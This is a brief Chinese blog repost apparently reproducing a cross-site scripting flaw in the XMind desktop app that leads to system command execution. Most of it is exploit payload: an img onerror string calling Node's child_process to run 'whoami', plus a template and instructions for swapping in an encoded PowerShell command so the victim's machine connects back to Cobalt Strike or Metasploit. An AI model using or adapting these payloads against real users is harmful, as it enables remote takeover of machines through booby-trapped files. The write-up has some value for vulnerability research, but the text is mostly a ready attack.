测试环境:
XMind 202005082128
<img src=x onerror="const exec = require(‘child_process‘).exec;exec(‘whoami‘).stdout.on(‘data‘, function (data) {alert(data);})">
shift
control
option
command
whoami
XSS执行系统命令,内核V8,上线到CS或者MSF,替换whoami,
通过对powershell进行编码,然后替换payload进行上线CS
payload:
<img src=x onerror="const exec = require(‘child_process‘).exec;exec(‘powershell(……)‘).stdout.on(‘data‘, function (data) {alert(data);})">
转载请注明:Adminxe‘s Blog ? XMind-XSS-V8内核命令执行复现
原文:https://www.cnblogs.com/cn-gov/p/14754447.html